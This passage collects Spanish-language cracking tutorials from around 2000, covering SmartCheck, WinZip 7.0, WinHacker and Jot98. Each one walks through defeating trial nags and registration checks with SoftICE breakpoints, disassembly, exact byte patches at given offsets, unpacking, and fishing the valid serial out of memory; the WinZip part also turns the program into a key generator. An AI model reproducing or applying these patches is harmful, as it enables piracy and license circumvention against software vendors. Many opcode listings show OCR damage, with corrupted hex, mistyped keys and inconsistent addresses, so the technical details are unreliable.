
Estabamos en que teniamos que cambiar este salto 10003EF4 7553 jne 10003F49 podriamos cambiarlo 
por un je o por un nop. Vamos a desensamblar el archivo t132v20 con el w32dsam pero sorpresa donde 
esta el p.... archivo, en el directorio de smartcheck no esta a saber, habra que buscarlo para esto windows 
nos hechara una mano, vamos a la barra de inicio-buscar-archivos o carpetas ponemos t132v20 y buscar 
vemos que aparece en el directorio de windows con que se queria esconder !eh;¡, continuemos con el 
w32dasm y busquemos t132v20 que ya sabemos donde esta y carguemoslo, ahora pinchemos en goto 
code location y metemos el numero 10003EF4 que nos llevara directamente al salto que queriamos, 
busquemos el offset de esta direccion de memoria, miremos en la parte de abajo de la pantalla que pone 
line tal. page cual. code data 1000EF4. offset 000032f4 lo apuntamos y cerramos el desensamblador, 
habrimos cualquier editor hexadecimal y buscamos este offset apareceremos en 75 53 si queremos que 
no salte cambiaremos el 75 que es igual a jne por 74 que es igual aje o otra opcion seria cambiar 75 53 
por 90 90 que seria igual a nop nop, la segunda opcion nunca saltaria metamos el codigo que metamos, 
pero en la primera opcion si tenemos mas chorra que felipito tacatum y acertamos metiendo el codigo 
correcto nos daria error. 


Una vez hecho esto comprobamos si funciona habrimos smartcheck metemos cualquier codigo y bingo 
nos da las gracias por registrarnos, pero cuando volvemos a habrir smartcheck nos vuelve a mostrar la 
dichosa pantallita, mal rollo para un novato como yo. 


Voy a intentar pensar como los grandes pofesionales, el programa cuando le damos a start vuelve a 
comprobar el codigo o si estamos registrados, intentare atacar esa llamada de comprobacion que hay 
arriba de nuestro salto, me meto en la rutina y veo un monton de llamadas hacia esa rutina, si solo 
hubiese sido una la podriamos haber atacado, pero encima de ser bastantes el programa cada vez que 
pulsamos start hace la llamada a esa rutina desde una posicion de memoria distinta. Dios mio que dolor 
de cabeza casi me se todo el proceso de esta proteccion. Bueno como seguir, ya tengo el numero de serie 
pero quiero hacerlo de otra manera. 


Pensemos, el proceso de proteccion corre en otro archivo que no es el ejecutable o sea smartcheck.exe, 
este ejecutable en algun momento tiene que hacer una llamada a este archivo, vamos a localizarla. 


3er intento: hay que eliminar la llamada a la proteccion y ponerle el valor que esta devuelve despues de 
pulsar OK en la pantalla de faltan x dias para que finalice esta demo. 


Estamos con smartcheck habierto y con un programa cargado, antes de pulsar sobre start que es cuando 
se llama a la proteccion, habrimos el sice (ctrl+d) y ponemos un breakpoint tal cual como - bpx 
dialogboxparam - ya digo el que puse directamente por que esto ya se esta haciendo demasiado largo y 
tengo que cenar, bueno cerramos el sice FS y pinchamos sobre start y salta el sice, pulsamos F12 y nos 
sale la pantalla de que nos quedan 45 dias, pinchamos sobre OK y salta otra vez el sice pulsamos F12 y 
estamos en el kernel de windows, fijaos en las letritas verdes del sice, pulsamos otra vez sobre F12 y 
estamos en la libreria t132v20 nuestro archivo recordais, pero nosotros queremos ver el ejecutable 
cuando llama a esta libreria, pulsamos F12 y estamos en otra libreria pulsamos F12 hasta que en la parte 
de abajo de sice en las letritas verdes aparezca smartcheck, aparecemos aqui: 


:0040E462 FF75B0 push [ebp-50] 
:0040E465 6898264000 push 00402698 
:0040E46A 688C264000 push 0040268C 


:0040E46F FF152CA54200 call [0042A52C]--------- llamada a las rutinas de proteccion------- 
:0040E475 85CO0 test eax, eax ------- nos devuelve aqui----------- 
:0040E477 7415 je 0040F48E -------- da el visto bueno--------- 


:0040E479 83BE9000000000 cmp dword ptr [esi+00000090], 00000000 


:0040E45F FF75EC push [ebp-14] 

:0040E462 FF75BO0 push [ebp-50] 

:0040E465 6898264000 push 00402698 

:0040E46A 688C264000 push 0040268C 

:0040E46F B801000000 mov eax, 00000001 

:0040E474 90 nop 

:0040E475 85CO0 test eax, eax 

:0040E477 7415 je 0040F48E 

:0040E479 83BE9000000000 cmp dword ptr [esi+00000090], 00000000 


Vemos que nos devuelve despues de pinchar sobre OK aqui en 0040E475 que hace una comparacion y 
luego un salto, lo veis claro no, ese salto hay que machacarlo, pues no, yo ya lo he probado y si lo 
cambias da un error, asi que hay que atacar a la llamada que esta mas arriba 0040E46F FF152CA54200 
call [0042A52C], para que no haga la llamada, pero si la quitamos poniendo 6 nops, el programa no hace 
nada cuando pulsamos start, ya no nos enseña la nag de los dias ni caducaria, le hemos quitado la 
proteccion, pero el programa no hace nada, bueno pues hay que ver que registros cambian desde que 
entramos en la llamada hasta que pulsamos Ok y salimos, quitamos los bpx que tengamos y ponemos 
dos bpx 0040E46F y bpx 0040E475, veis la idea el programa se parara antes de entrar en las rutinas de 
proteccion y cuando salga para fijarnos en todos los registros, hacemos todo el recorrido y vemos que 
cuando se para en el primer bpx el valor de eax es O y cuando volvemos de pulsar OK y se para en el 
segundo bpx el valor de eax es 1, pues ya lo tenemos, hay que quitar el call y subir eax a 1, vamos a ver 
como cambiar esto. 


Ejecutemos todo otra vez y nos paramos en el primer breakpoint que pusimos recuerda 


0040E46F call [0042A52C]--------- primer breakpoint------- 
0040E475 test eax, eax ------- segundo breakpoint----------- 


Fijaos que si restamos estas dos posiciones de memoria (0040E475-0040E46EF) nos da 6 bytes que es lo 
que ocupa la instruccion call [0042A52C], o sea que si queremos quitar esta llamada tendremos que 
sustituir los 6 bytes por nops, si no lo hacemos asi nos saldran instruccion por enmedio y nos joderia el 
programa. Y como cambiar estos bytes, estamos encima de la direccion 0040E46F, ponemos en sice - d 
eip - y en la ventana de datos nos sale esta direccion con los bytes en hexadecimal. pues nos situamos 
sobre el primer byte de esa ventana y cambiamos los 6 primeros bytes por 90 y pulsamos enter, Veis en 
la ventana de codigo como nos han salido 6 lineas con nop. Ahora nos queda subir eax a 1 en el sice 
metemos una a y nos sale esto 015F:0040E46F escribimos mov eax,1 y pulsamos dos veces enter, antes 
que nada pongamos otra vez d eip y fijemonos en la pantalla de datos y apuntamos los 6 primeros bytes 
que habran quedado asi: B8 01 00 00 00 90, como ya hemos terminado con el sice lo cerramos pulsamos 
FS un par de veces y ya se ejecuta el smartchek perfectamente sin mostrarnos la pantalla de limitacion. 
Ahora hay que cambiar lo que hemos hecho sobre el codigo del programa porque lo que hemos hecho a 
sido cambiarlo en memoria y cuando volvamos a arrancar el programa se habra borrado. 


Supongo que ya sabreis como cambiarlo, ya lo hemos hecho antes teneis que buscar el offset en 
w32dasm de la direccion 0040E46F e ir al editor hexadecimal y cambiar los 6 bytes que habiamos 
cambiado en memoria. 


conclusiones: 


Hemos visto la fragilidad de estos programas que usan protecciones ajenas a este. Me explico esta misma 
proteccion la he visto en otros programas que no son de numega, por lo que deduzco que esta proteccion 
numega la ha comprado y la ha pegado a su programa, con lo cual la facilidad con que la hemos quitado. 


Un saludo a todos. Gracias a Karpoff y a todos los que teneis un tutorial en su web, sin vosotros saberlo 
sois mis mentores en este apasionante arte llamado INGENIERIA INVERSA. 


Por Fanega. 


Karpoff Spanish Tutor 


Programa: Winzip 7.0 


PROTECCION: mag Screen molesta. 

Descripcion: Descompresor, compresor de archivos. 

| Dificultad: | Principiante 

DONNLOAD: mu inzip.con 

Herramientas: Softico, W32dasm, Editor Hexadecimal 
CRACKER: Fanega FECHA: 11/6/2000 


INTRODUCCION 


Hola a todos, hoy he querido hacer un tutorial sobre un programa que todo el mundo 
tenemos instalado en nuestro ordenador, y del cual aun no he visto ningun tutorial en 
español sobre el y si lo hay espero que este sea un buen complemento. 


Antes de empezar mencionaré que se debe tener ya algun conocimiento sobre las 
herramientas que vamos a utilizar. 


AL ATAKE 


El primer paso es por supuesto instalar el programa y hacer una copia del ejecutable en 
este caso Winzip32.exe. Inmediatamente veremos como funciona este programa, 
abrimos el winzip en el escritorio tienes que tener algun acceso directo, si no vete a la 
barra de inicio de windows Lo primero que hace es abrirnos una ventana en la que pone 
algo asi como. Esta es una version completa solo para evaluacion. La version registrada 
no enseña esta ventana. Si miramos la licencia, nos dice que tenemos 21 dias para 
probarlo pero he de decir que yo lo he tenido mucho tiempo instalado y la unica 
limitacion que he encontrado es la molesta ventana que se abre al principio. 
Observemos un poco esta ventana con 5 botones, el de licencia, de registrarse, de 
informacion, de salir y el de aceptar, si nos fijamos en estos dos ultimos, veremos que 
cada vez que abrimos el winzip, igual aparece el boton de i agree en donde estaba el de 
quit o al reves, que mareo. ¿cuales habran sido los tenebrosos pensamientos del 
programador?, que no se nos haga automatico el pinchar sobre 1 agree sin mirar la 
pantalla, o sera un sistema de proteccion, si es por la segunda opcion a conseguido con 
ello irritarnos teniendo que buscar el dichoso boton cada vez. 


Bueno como primera idea, miraremos si nos da algun mensaje de error al intentar 
registrarme, pincho sobre el boton Enter registration code. y se abre otra ventana 
pidiendonos el nombre y la clave de registro, antes de poner nada un consejo meter algo 
facil de ver rapido, no es lo mismo meter 12345367890 que meter ufkklImhbh, veis la 
diferencia, ni meter 555555553, por que si estamos en la rutina de comprobacion no 
sabremos si esta comparando el primer numero, o el cuarto. Dicho esto metamosle 
algun nombre y clave de registro y le damos a OK, nos enseña un mensaje de error 
Incomplete or incorrect information. 


Por aqui empezaremos cerramos Winzip, abrimos el W32dasm y cargamos el ejecutable 
Winzip32.exe, busquemos en string refs el mensaje de error, cuando lo encontramos 
pinchamos varias veces con el raton sobre el para ver cuantas referencias hay sobre el, 
vemos que hay dos yo me he decantado por la primera por que si miramos el codigo 
hacia arriba hay dos referencias una a Name y otra a Sn , esto me suena de la ventana de 
registro. 


* Reference To: USER32.GetDlgltemTextA, Ord:00FS5h 


:00408036 FF150C844600 Call dword ptr [0046840C] 
:0040803C 56 push esi 

:0040803D E800160200 call 00429642 

:00408042 59 pop ecx 

:00408043 56 push esi 


:00408044 E822160200 call 0042966B 

:00408049 803D18D9470000 cmp byte ptr [0047D918], 00-compara el nombre-- 
:00408050 59 pop ecx 

:00408051 745F je 004080B2--Salta al mensaje de error si en nombre no introduces nada-- 
:00408053 803D48D9470000 cmp byte ptr [0047D948], 00--compara registration-- 
:0040805A 7456 je 004080B2--Salta al error si en registration no introducimos nada-- 
:0040805C ESEAFAFFFEF call 00407B4B-Llamada a las rutinas de comprobacion-- 
:00408061 85CO0 test eax, eax--Comprueba el valor devuelto-------- 

:00408063 744D je 004080B2---Salta si no introducimos el codigo correcto--- 

:00408065 53 push ebx 


* Possible StringData Ref from Data Obj ->"WinZip" 


:00408066 BBA80C4700 mov ebx, 00470CAS 


* Possible StringData Ref from Data Obj ->"Name" 
| 

:0040806B 68F8EA4600 push 0046EAFS 
:00408070 53 push ebx 

:00408071 E877A70200 call 004327ED 

:00408076 83C40C add esp, 0000000C 

:00408079 56 push esi 


* Possible StringData Ref from Data Obj ->"SN" 


:0040807A 6894F44600 push 0046F494 
:0040807F 53 push ebx 

:00408080 E868A70200 call 004327ED 
:00408085 83C40C add esp, 0000000C 


* Possible StringData Ref from Data Obj ->"winzip32.in1" 
| 

:00408088 68C80C4700 push 00470CC8 

:0040808D 6A00 push 00000000 

:0040808F 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"rrs" 


:00408091 6804EB4600 push 0046EB04 

:00408096 E839A70200 call 004327D4 

:0040809B A190944700 mov eax, dword ptr [00479490] 
:004080A0 83C410 add esp, 00000010 

:004080A3 85CO0 test eax, eax 

:004080A5 7407 je 0O4080AE 

:004080A7 50 push eax 


* Reference To: GDI32.DeleteObject, Ord:0046h 


| 
:004080A8 FF1560804600 Call dword ptr [00468060] 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 


[:00407FC9(U), :004080A5(C) 


| 
:004080AE 6A01 push 00000001 


:004080B0 EB31 ¡mp 004080E3 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
1:00408051(C), :0040805A(C), :00408063(C)-saltos que vienen a esta rutina--- 


:004080B2 E8E5010000 call 0040829C 


U 


* Possible Reference to String Resource ID=006534: "Incomplete or incorrect information' 


| 
:004080B7 688E020000 push 0000028E--estamos aqui-- 


:004080BC E844050200 call 00428605 

:004080C1 59 pop ecx 

:004080C2 50 push eax 

:004080C3 57 push edi 

:004080C4 6A3D push 0000003D 

:004080C6 ESC5E60100 call 00426790 

Empecemos por esta parte de codigo, estamos en la direccion 004080B7 y por encima 
hay un aviso de tres saltos condicionales o incondicionales que hacen referencia a esta 
parte de codigo, como estan cerca de aquí las buscaremos desplazandonos hacia arriba 
con el raton. 


Ya tenemos que estar encima de estos saltos, los tres estan uno encima de otro ¿pero 
que hacen cada uno de estos saltos?, ¿cual tendre que cambiar para que no salte?, la 
gente que sepa de ensamblador lo sabra pero yo no tengo ni idea, cogamos el numero de 
la direccion de cada salto y el offset de cada uno por si nos hace falta: 


Code data Offset 
00408051 7451 
0040805A 745A 
00408063 7463 


Cerramos el Win32dasm y abrimos el loader de sice, cargamos el winzip, le damos al 
boton de load, al mensaje de error que sale le decimos que si y salta el sice, acto seguido 
ponemos tres breakpoints en las direccion que hemos cogido bpx 004080531, bpx 
0040805A, bpx 00408063 pulsamos FS, se abre la primera ventana de winzip, 
pinchamos en Enter Registration code y rellenamos lo que nos pide Name y 
Registration pulsamos Ok y salta el sice en el primer Bpx, o sea en el primer salto, el 
sice mismo nos indica que no saltamos, este no es el que buscamos otra vez F3 y 
paramos en el segundo Bpx, el sice tambien nos indica que no saltamos, otra vez F5 y 
ya estamos en tercer Bpx 00408063 el sice nos indica que este si que salta, este sera 
nuestro salto. Pero que hacen los otros saltos anteriores, su mision es saltar al mensaje 


de error cuando no ponemos nada en Name o Registration. A continuacion normalmente 
cerrariamos todo y como ya tenemos el offset, fijate en la tabla de mas arriba iriamos al 
editor hexadecimal para cambiar este salto, pero nos ahorraremos ese trabajo, vamos a 
cambiarlo en el sice ponemos d eip y con el cursor pinchamos sobre el primer byte de la 
ventana de datos del sice que sera 74 lo cambiamos por 75 y le damos a enter, pulsamos 
FS y nos aparece una ventana en el winzip pidiendonos que confirmemos, si hemos 
entrado bien el nombre y la clave de registro le damos a Ok y empieza a funcionar el 
winzip, antes de lanzar las campanas al vuelo comprobemos si todo funciona bien, 
cerramos winzip y el loader del sice pero ojo muy importante no hay que quitar los bpx 
que teniamos, ejecutemos el winzip y aparece la ventana de marras, no hemos 
conseguido registrar el programa, ademas no pasa por nuestros bpx eso quiere decir que 
va a las rutinas de comprobacion desde otras llamadas, cierra el winzip y quita los bpx 
del sice bc *, como hemos hecho antes abramos w32dasm y carguemos winzip32.exe, 
quiero localizar desde donde se llama a esas rutinas, y ¿como hacerlo?, ya conozco una 
llamada a esas rutinas esta encima del que creia que era nuestro salto asi que vamos a 
ese salto. pinchamos en goto code location y metemos nuestro salto 00408063 
aparecemos en esta parte de codigo 


00408049 803D18D9470000 cmp byte ptr [0047D918], 00-compara el nombre-- 
:00408050 59 pop ecx 

:00408051 745F je 004080B2--Salta al mensaje de error si en nombre no introduces nada-- 
:00408053 803D48D9470000 emp byte ptr [0047D948], 00--compara registration-- 
:0040805A 7456 je 004080B2--Salta al error si en registration no introducimos nada-- 
:0040805C ESEAFAFFFEF call 00407B4B-Llamada a las rutinas de comprobacion-- 
:00408061 85CO0 test eax, eax--Comprueba el valor devuelto-------- 

:00408063 744D je 004080B2---aparecemos aqui--- 


Dos lineas de codigo mas arriba hay una llamada a las rutinas de comprobacion, nos 
situamos sobre ella y pulsamos el boton de call en el w32dasm y nos llevara: 


* Referenced by a CALL at Addresses: 
1:0040108C , :00401228 , :0040805C , :0042D095 


:00407B4B 55 push ebp 

:00407B4C 8BEC mov ebp, esp 

:00407B4E 81EC08020000 sub esp, 00000208 
:00407B54 53 push ebx 


Lo que nos interesa de aqui es el Referenced by a CALL etc. hay cuatro llamadas a esta 
rutina y por supuesto esta la que nosotros venimos, apuntamos las cuatro llamadas 
:0040108C , :00401228 , :0040805C , :0042D095 cerramos el w32dasm, otra vez 
cargamos el winzip con el loader del sice y cuando salte el sice le metemos estas 
direcciones como breakpoints pulsamos FS y salta el primer bpx en 00401228: 


:00401228 call 00407B4B---llama a las rutinas de comparacion---- 
:0040122D test eax, eax 
:0040122F jne 004011A8 --Salta si estamos registrados------- 


Pulsamos F10 dos veces y nos quedamos en la linea 0040122f en la cual hay un salto 
cambiemoslo a ver que pasa, en el sice ponemos d eip y en la ventana de datos nos 
situamos sobre el segundo byte que es un 85 y lo cambiamos por un 84, pulsamos enter 
y ES el winzip comienza a funcionar sin mostrarnos la ventana del principio, cerramos 
el programa y comprobamos que no salta ningun breakpoint mas, el programa queda 
totalmente funcional. El siguiente paso seria buscar el offset en el w32dasm y con el 
editor hexadecimal cambiar el salto. Al final del tutorial hay una explicacion de como 
hacer esto. 


En esta 2* opcion veremos que el programa aun damas de si, vamos a revisar las rutinas 
que generan la clave de registro y comparan las claves. 


Fijaros en las tres lineas de codigo que hay mas arriba concretamente sobre esta 
00401228 call 00407B4B---llama a las rutinas de comparacion----, como ya sabemos cual es la 
linea de codigo donde estan esas rutinas, abramos el loader del sice y carguemos el 
w1nzip como estamos haciendo durante todo el tutorial, cuando salte por primera vez el 
sice metemos este bpx 00407B4B y le damos a ES, el programa salta en el breakpoint 
que acabamos de poner y vamos pulsando F10 hasta que estemos sobre la linea de 
codigo 00407C2A y nos paramos 


:00407C0E lea eax,[ebp-0140] 

:00407C14 push eax 

:00407C15 push edi 

:00407C16 call 00407CC6--Genera la clave de registro-- 
:00407C1B pop ecx 

:00407C1C mov esi, 0047D948--Carga nuestra clave en esi--- 
:00407C21 pop ecx 

:00407C22 lea eax, [ebp-0140]--carga la clave generada en eax-- 
:00407C28 push esi 

:00407C29 push eax 

:00407C2A call 004578A0--Compara las claves---- 
:00407C2F neg eax 

:00407C31 sbb eax, eax 


Miremos la parte de codigo que tenemos arriba, si entrasemos en la llamada que hay en 
la linea de codigo 00407c16, veriamos paso a paso como se genera la clave de registro, 
si quieres hacer un generador de claves de este programa esta es la llamada, 
continuamos hacia abajo y en la linea 00407C1C mov esi, 0047D948 esto quiere decir 
mueve 0047D948 a esi, si ponemos en el sice d 0047d948 veremos en la ventana de 
datos que está nuestra clave, o sea que esta instruccion carga nuestra clave a esi, 


continuamos mas abajo y en la linea de codigo 00407C22 lea eax, [ebp-0140], esta 
instruccion carga en eax el contenido de ebp-0140 si ponemos en el sice d ebp-0140 en 
la ventana de datos nos sale la clave generada por el ordenador a partir de nuestro 
nombre, o sea la correcta. Continuamos hacia abajo hasta la linea 00407C2A call 
004578A0 si entrasemos en esta llamada veriamos como se comparan las dos claves. 


Mira un poco el codigo de arriba a ver que se te ocurre que podamos hacer. 


Esto es lo que se me ocurre a mi, en la llamada 00407C2A, podriamos estudiar que 
valor tendria que tener el registro eax despues de retornar de esa llamada, y meterle 
directamente ese valor para que piense que es correcta nuestra clave, la solucion seria 
sustirtuir el call 004578A0 por mov eax,0 yo lo probe y el programa funciona 
perfectamente. 


Pero lo aremos de otra forma, antes de llegar a esta llamada, ya hemos visto donde se 
carga nuestra clave en esi, y donde se carga la clave generada en eax, mi idea es 

cambiar alguna de estas dos lineas de codigo para que se cargue en eax y en esi la 
misma clave y asi al compararlas como serian iguales todo iria bien. ¿Cual cambiar? si 
cambio 00407C1C mov esi, 0047D948 por 00407C1C mov esi,[ebp-0140] no me cabe 

y se destroza todo el codigo de abajo, por el contrario si cambio 00407C22 lea eax, [ebp- 
0140] por 00407C22 lea eax,[0047D948] si que me cabe, ahora eax y esi contienen la 
clave que yo he introducido y por lo tanto son iguales, de esta manera el programa 
ademas de funcionar perfectamente, si miramos en el about del winzip estamos hasta 
registrados con nuestro nombre y clave. 


¿Y si rizamos el rizo aun mas?, fijaos en la linea 00407C0E lea eax,[ebp-0140] ojo que 
no es la misma que la anterior aunque contenga el mismo codigo. Esta linea carga en 
eax una direccion de memoria en la cual el programa almacenara la clave buena despues 
de generarla. ¿Y que podemos hacer aqui?, lo mismo que antes si cambiamos 
00407C0E lea eax,[ebp-0140] por 00407C0E lea eax,[0047D948] (recordemos que 
00474948 lleva almacenada nuestra clave), entonces el programa almacenara la clave 
generada en 0047D948. Este cambio comporta que cuando lleguemos a la llamada de 
comparacion, compara la clave buena con la clave buena. 


Y tu diras el porque de hacer los dos cambios si con el primero ya basta, por lo 
siguiente, al registrarnos nos muestra la siguiente ventana donde nos dice algo asi, 
comprueba si has metido bien el nombre y la clave, aqui nos enseñara el nombre que 
hemos metido mas la clave buena no la clave que habiamos metido, espero que lo 
entendais. En esta ventana si en vez de pulsar Ok le damos a Retry y metemos otro 
nombre nos dara la clave buena de ese nombre, hemos conseguido una especie de 
generador de claves. 


Vamos a hacer los cambios necesarios para que se de este evento, abre el loader del sice 
carga el winzip dale a load y cuando salte el sice pon un bpx 00407C0E, dale a FS y 
saltaras al breakpoint, fijate en los bytes que hay entre 00407C0E y 00407C14 (407C14- 
407C0E) son 6 bytes, ponemos en sice d 00407C0E y apuntamos los 6 primeros bytes 
de la ventana de datos del sice, ahora ponemos a y enter saldra esto 015f :00407C0E 
pon lea eax,[0047D948] y pulsa dos veces enter, ahora apunta los 6 primeros bytes de la 
ventana de datos tendras esto: antes 

015f :00407C0E 8D 85 CO FE FF FF 

despues del cambio 

015f :00407C0E 8D 05 48 D9 47 00 

Recuerda que la linea 00407C22 tambien la tenemos que cambiar pero como el cambio 
es el mismo no hace falta repetir la opiracion solo cambia la linea de codigo: 

antes 

015f :00407C22 8D 85 CO FE FF FF 

despues del cambio 

015f :00407C22 8D 05 48 D9 47 00 

quitamos el breakpoint bc * y cerramos todo abrimos el w32dasm cargamos el 
winzip32.exe y en goto code location buscamos 00407C0E miramos debajo el offset 
que tiene y repetimos la operacion con 00407C22 quedara asi 


Code data offset 
00407C0E 700E 
00407C22 7022 


Cerramos w32dasm y habrimos algun editor hexadecimal buscamos los offsets y 
realizamos los cambios necesarios. Ya tenemos el programa totalmente funcional y 
debidamente registrados con la clave correcta y todo. 


Hasta aqui todo, creo que ya me extendido bastante, y tu me diras ¡es que joder como te 
enrrollas!, ya pero yo creo que si se quiere aprender lo mejor es estudiar perfectamente 
los programas y no hacernos el chulo diciendo yo lo crackee en 2 minutos. 


Un saludo a toda la peña y hasta otra. 
Por fanega 


fanegal O airtel.net 


Karpoff Spanish Tutor 


Programa: WinHacker v2.03 


PROTECCION: Limitado a 20 dias 


Descripcion: Toquitear las entrañas de Windows 


DN 


DOWNLOAD : http://www.winhacker.com/ 


Herramientas: Softice v3x< 
CRACKER: KuaTo_ThoR FECHA: 23/06/2000 


INTRODUCCION 


Al parecer este programa sirve para adentrarse en lo más profundo de windows, la verdad es que no lo sé 
porque no he tenido tiempo de probarlo. Además he visto tutoriales para este programa (otras versiones) de 
como crakearlo, y me decidí a probar si conseguía el serial (que siempre es más fisno), y así probar mis 
escasos conocimientos del tema. Me sorprendió la facilidad con la que lo conseguí, así que os animo a que lo 
intentéis antes de leer lo que viene a continuación. 


AL ATAKE 


Bueno vamos allá. 


Lo primero es ejecutar el programa, nos aparece un bonito nag recordandonos que sólo tenemos 20 dias de prueba, y 
ya nos aparece la ventana de registro, que considerado, no tenemos ni que entrar en el programa. 


Bien rellenamos cada hueco con los datos que queramos, por ejemplo: 
Name: Chiquito > Company: Bonanza ; Serial Num: 444666888. 
Antes de dar a Register, vamos a Softcie (Ctrl+D) y ponemos un bonito breakpoint, en este caso bpx getwindowtexta, 


¿por qué? bueno, tendrá que leer los datos verdad? Volvamos a windows (FS) pulsamos Register y plash... de vuelta a 
softice, como hemos rellenado tres campos, tendrá que leer los otros dos asi que pulsamos un par de veces ES. Ahora 


ya ha leido todos nuestros datos, pero aún no estamos en WinHacker, estamos en User32!, pues bien pulsamos F12 (yo 
un par de veces) hasta que estemos en wh95!, ahora sí, ya podemos quitar el breakpoint (bc0). 


Ahora estamos en el WinHacker, veamos si encontramos nuestro código, ponemos d eax, y nada, ponemos d ecx y 
¡¡Bingo!! hay nos aparece nuestro flamante 444666888, qué podemos hacer con esto, pués por ejemplo si ponemos 
?ecx, nos aparece 6D46BO0 y un rollete, esto es algo así a la dirección donde se encuentra nuestro código chungo (si no 
es así espero a que alguien me lo explique), lo ideal sería poder seguir a nuestro código hasta la comparación con el 
bueno, ¿se puede hacer?, por supuesto, si no no lo hubiese puesto, pongamos pués un breakpoint pero esta vez no un 
bpx si no un bpm 6D46B0 (break on memory access). Pulsamos ES para dejarlo correr y ¡¡Plash!! otra vez en softice, 
pero en el User32, luego pulsamos F12 hasta aparecer en Wh95 y nos saldra algo como esto: 


:7800328B 8B02 Mov eax, [edx] 
:7800328D 3A01 Cmp Al, ecx 
7800328F 7530 JNZ 780032C1 -------- Aquí aparecemos 


Escribimos d ecx, y efectivamente hay está nuestro código chungo, miramos en las proximidades haber si hay cosas 
interesantes y encontramos bastantes, comparaciones por aquí, operaciones por allá, parece que edx puede tener algo 
interesante, ponemos d edx y ¡¡sorpresa!! aparece algo como d6cb-5d2eec, tiene toda la pinta de ser un código. Nos 
salimos (FS), lo probamos y ... ESTAMOS REGISTRADOS. 


Esto es todo, pido perdón por los errores que haya cometido y espero que os haya servido de ayuda. 


P.D.: Cualquier duda, rectificación, lo que sea a: 


Karpoff Spanish Tutor 


Jot98 v1.02 y Más... 


Programa: 


PROTECCION: Limitacion de Usos. 


Descripcion: Block de Notas de lujo. 

Dificultad: Principiante +. 

DOWNLOAD : http: //www.spaeder.com 

Herramientas: Softice, W32dasm, Editor Hexa y un descompresor Shrink 


CRACKER: KuaTo_ThoR FECHA: 01/07/2000 


INTRODUCCION 


Este programa como todos los de esta compañía (al menos los que yo he visto), tienen la misma protección, 
límite de uso de X veces, nag que nos lo recuerda de vez en cuando, archivos empaquetados, el código de 
validación va a un archivo, todo hecho de serie, grave error, así si cae uno caen todos como vamos a 
comprobar. 


La mayoría de utilidades a las que hago referencia están en la página de Karpoff, pero si no están aquí sí 
http://protools.exit.de/. 


AL ATAKE 


Vamos con el Jot98: 


Lo primero como siempr s ejecutar el programa, nos sale a recibir un nag avisandonos que 
podemos ejecutar el programa sólo 30 veces a no ser que soltemos 20$, damos ok y un bonito 
archivo de texto nos cuenta las maravillas del producto. Bien a lo que vamos, miramos en la 
ayuda, y leemos la información de registro, para ver si existe alguna limitación más, lo leemos 
y nada, sólo los 30 usos. Ahora ya podemos empezar. Vamos donde se mete la clave de registro, 
metemos lo que queramos y nos aparece Invalid Registration code. 


1% Desempaquetado: 


Como no tengo el Softice cargado, vamos con Wdasm, primero hacemos una copia de nuestro archivo 
'víctima' , y nos decidimos a abrir este último tan contentos, le damos y... mensaje de error 
Esto nos huele a empaguetado, damos a aceptar, y ya podemos ver de qu mpaquetador se trata, el 
Shrink. Pero qué versión, un truco para verlo sin el famoso GetTyp, es con el editor hexa (yo 
uso el AXE), no se si funciona con todos los empaquetadores, pero no perdemos nada con probar. 
Ahí va, abrimos nuestro archivo con el editor hexa, vamos a las últimas líneas del código y ahí 
está, Shrink 34 no hay más que decir. 


Podemos hacer dos cosas, desempaquetarlo o utilizar el Softice. 


Vamos a desempaquetarlo, con las herramientas adecuadas se hace sólo, concretamente yo he 
utilizado un desempaquetador específico de Shrink 34, se lama DeShrink (v1.6) de un tal j0b 
(desde aquí le agradezco su trabajo). Si utilizáis este progama, no tenéis más que meter el 
archivo a desempaquetar (Jot98.exe), poner el nombre del archivo de salida (p.e. jot98_un), y 
darle a decompress. Ya está desempagquetado, podemos ver que el tamaño del nuevo archivo es 
mayor, y podemos probar a ejecutarlo y todo funciona corrctamente. 


2% Parcheado 


Ahora podemos abrir nuestro nuevo ejecutable con Wdasm buscamos la frasecita de error en String 
References, y ahi está, pulsamos dos veces sobre ella y nos lleva a donde queremos (no está 
demás pulsar otra vez para ver si el mismo mensaje aparece más de una vez). Efectivamente, 
aparecen dos lugares, el segundo es: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0045458A(C) 

:004547DC 6A00 push 00000000 

:004547DE 668B0DBC484500 mov Cx, word ptr [004548BC] 

:004547E5 33D2 xor edx, edx 


* Possible StringData Ref from Code Obj ->"Invalid registration code." 


:004547E7 A1B4974500 mov eax, dword ptr [004597B4] 
:004547EC ESCT6BFEFF call 0043B3B8 


Vamos a 0045458A, y nos aparece una estructura que nos debe resultar bastante conocida, jeje: 


:0045457A E8S99F8FAFF call 00403E18 

:0045457F 8B45CC mov eax, dword ptr [ebp-34] < Prepara eax 
:00454582 8B55E4 mov edx, dword ptr [ebp-1C] < Prepara edx 
:00454585 ES9AFJIFAFF call 00403D24 <--- Compara edx y eax 
:0045458A 0F854C020000 jne 004547DC <--=-= Vamos a Invalid Code  :( 


:00454590 8B153CA84500 mov edx, dword ptr [0045A83C] 
:00454596 8BC6 mov eax, esi 
:00454598 E83F0C0000 call 004551DC 


Apuntamos 00454585 en un papelito para luego ;-). Desde luego este salto no nos interesa nada, 
por tanto decidimos, por ejemplo, nopearlo. Nos vamos a apuntar el Offset 0005458A y también los 
bytes 0F854c020000. ¿Y qué pasa con el otro mensaje de Invalid Code? pues ahí va: 


:0045447B 8B45CC mov eax, dword ptr [ebp-34] 
:0045447E ES91F7FAFF call 00403C14 


:00454483 83F80F cmp eax, 0000000F <---— Compara eax con 15 

:00454486 7TElA jle 004544A2 <--=-=-= Este salto nos interesa hacerlo 
:00454488 6A00 push 00000000 

:0045448A 668B0DBC484500 mov CX, word ptr [004548BC] 

:00454491 33D2 xor edx, edx 


* Possible StringData Ref from Code Obj ->"Invalid registration code." 
:00454493 A1B4974500 mov eax, dword ptr [004597B4] 

:00454498 ES1B6FFEFF call 0043B3B8 

:0045449D E94F030000 jmp 004547F1 


Como podemos ver hay un salto (salta si es menor o igual) un poco antes de llegar al mensaje de 
error, desde luego nos interesa hacerlo. Veamos que hay antes del salto, se compara eax con 15, 
no hace falta tener mucha imaginación para pensar que se está comparando el tamaño de nuestro 
código (o nombre), si estuviesemos en el Softice, con poner d eax lo sabríamos. Por tanto con 
meter un código de longitud inferior a 15 ya nos habríamos librado de este mensaje de error. 


